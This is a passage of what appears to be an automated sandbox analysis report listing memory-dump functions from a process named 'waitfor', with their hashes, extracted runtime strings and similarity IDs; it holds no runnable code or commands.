                                                                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                • Instruction Fuzzy Hash: C4021471508381AFD345CF18C494A6ABBE5EFC8708F148E2DF98A9B254EB71E945CB42
                                                                                                                Function 047DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldvrm
                                                                                                                • String ID: +$-$0$0
                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                • Instruction ID: 1d2c29b8b9de64d724dd1a1ebbad4a795d652bcc6124bfdd1da3950eaca96a10
                                                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                • Instruction Fuzzy Hash: 3581E130E252499FDF24CF68C8907FEBBB5AF45360F1A425AE861A7391D734B840CB60
                                                                                                                Function 048420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                • Opcode ID: aa6566e79a17c7d5e28b420ef2ead60dae3c32246fb0d9a65ea9381993ae3faf
                                                                                                                • Instruction ID: 9954cbf3bb2ecb198fc97dfec3d1b6d789a2f8a759343377221ef8110f2caaff
                                                                                                                • Opcode Fuzzy Hash: aa6566e79a17c7d5e28b420ef2ead60dae3c32246fb0d9a65ea9381993ae3faf
                                                                                                                • Instruction Fuzzy Hash: FC215676A0011D9BDB10DFA9C8449BEB7F8EF84784F040656F915D3200E730F901CBA1
                                                                                                                Function 047BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • RTL: Re-Waiting, xrefs: 0480031E
                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048002BD
                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048002E7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                • API String ID: 0-2474120054
                                                                                                                • Opcode ID: f2b11d7a1b77b64b67efb8c23f15d02fbee42c5bcde58051d99ecaab813151f6
                                                                                                                • Instruction ID: 2dfffca65884f9dec258acf6251fd3bce5982128f2a08f550c6b4cf024587c94
                                                                                                                • Opcode Fuzzy Hash: f2b11d7a1b77b64b67efb8c23f15d02fbee42c5bcde58051d99ecaab813151f6
                                                                                                                • Instruction Fuzzy Hash: B5E1BD306147419FD725CF28DC84B6AB7E0AB89718F144A5DE9A5CB3E1E774E844CB82
                                                                                                                Function 047CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • RTL: Re-Waiting, xrefs: 04807BAC
                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04807B7F
                                                                                                                • RTL: Resource at %p, xrefs: 04807B8E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                • API String ID: 0-871070163
                                                                                                                • Opcode ID: 2bf7d941e0a98fa692235a4e320067167db3360f36d61a55c4557025b3e9513f
                                                                                                                • Instruction ID: 57969e09a7a95a9e0b78e4861aed8b9efb63837c2848bdbaca3cb9cfd703ba7e
                                                                                                                • Opcode Fuzzy Hash: 2bf7d941e0a98fa692235a4e320067167db3360f36d61a55c4557025b3e9513f
                                                                                                                • Instruction Fuzzy Hash: 9E41BD317007029FDB24DE29DC51B6AB7E5EB88714F100A2DF95ADB780DB71F8458B91
                                                                                                                Function 047CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0480728C
                                                                                                                Strings
                                                                                                                • RTL: Re-Waiting, xrefs: 048072C1
                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04807294
                                                                                                                • RTL: Resource at %p, xrefs: 048072A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                • API String ID: 885266447-605551621
                                                                                                                • Opcode ID: 8b29b8747785d36a756b319bc422f7a20ac15de63621c54a9e5651ec4678e07a
                                                                                                                • Instruction ID: 4c962a64e8c1a11d3513c4cc65334912f5eb4c3c1a887a1375b316fd49adbd1c
                                                                                                                • Opcode Fuzzy Hash: 8b29b8747785d36a756b319bc422f7a20ac15de63621c54a9e5651ec4678e07a
                                                                                                                • Instruction Fuzzy Hash: 9F41EF71704216ABD720DE25DC42B66B7A5FB84714F104B1DFA56EB380EB30F8528BD1
                                                                                                                Function 04842300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: %%%u$]:%u
                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                • Opcode ID: 4fb75de46081f82ec2f8db600c379e1df94fc562e7c62f3c8311557325e7f3ae
                                                                                                                • Instruction ID: ae8647bd267320a5a19d1ba1a0846ec3ccbd85b241b9479a6a564110fecd7e70
                                                                                                                • Opcode Fuzzy Hash: 4fb75de46081f82ec2f8db600c379e1df94fc562e7c62f3c8311557325e7f3ae
                                                                                                                • Instruction Fuzzy Hash: 7D31457260061D9FDB20DF2DCC44BAEB7B8EB44754F444995E849E3240EB31BA448B61
                                                                                                                Function 04AB3A70 Relevance: 6.3, Strings: 5, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3815775594.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4ab0000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *'2$!</6$#jf$$4$jf"#
                                                                                                                • API String ID: 0-3454608543
                                                                                                                • Opcode ID: e94a3d83ea83a161a1fbd5a7129fce51fc4a760f4d21ba55dd701e68776cf658
                                                                                                                • Instruction ID: 035c09d40a531a6aa5a2d66163aa5af20138afe6c583a1e43e8e544c16cf9462
                                                                                                                • Opcode Fuzzy Hash: e94a3d83ea83a161a1fbd5a7129fce51fc4a760f4d21ba55dd701e68776cf658
                                                                                                                • Instruction Fuzzy Hash: 3FF0B47002C7444FC704AF14D844596B7E5FF8930CF801B9CE88ADB142D779D6458B86
                                                                                                                Function 047D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldvrm
                                                                                                                • String ID: +$-
                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                • Instruction ID: ff0b5460fa5dc5610cf1d2d6d8c9036e395af9cd8b83a670e2a4c1f1e99d862a
                                                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                • Instruction Fuzzy Hash: F1918271E202169BDF3CDE69C881ABEB7B5EF44720F54491AE865EB3C0E730A9418761
                                                                                                                Function 04799126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $$@
                                                                                                                • API String ID: 0-1194432280
                                                                                                                • Opcode ID: 373369a19a4a4181457bed351ccdf31e8602eb68bf791bf66f373b7a5858ea42
                                                                                                                • Instruction ID: f863d8b42fb40ff9630054135117c4f3dbed7dbff1843afedba06ef8e3ea0fad
                                                                                                                • Opcode Fuzzy Hash: 373369a19a4a4181457bed351ccdf31e8602eb68bf791bf66f373b7a5858ea42
                                                                                                                • Instruction Fuzzy Hash: 3A810AB1D002699BDB35CB54CC45BEAB7B4AB48714F0045DAEA19B7780E731AE84DFA0
                                                                                                                Function 0481CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0481CFBD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallFilterFunc@8
                                                                                                                • String ID: @$@4rw@4rw
                                                                                                                • API String ID: 4062629308-2979693914
                                                                                                                • Opcode ID: 28632e6ab10916a9119b4a2f05d4ea77c2e01d1efae194f2b30fbd70b33ee138
                                                                                                                • Instruction ID: 32eedaca3af5c81c495a3b77d7ceafcbc1cd0609070c6e8df1ef4d714f27855d
                                                                                                                • Opcode Fuzzy Hash: 28632e6ab10916a9119b4a2f05d4ea77c2e01d1efae194f2b30fbd70b33ee138
                                                                                                                • Instruction Fuzzy Hash: BB418171A40214DFDB21AFA9D844A6DBBF8EF44B04F004A2EE915EB365E774F801CB51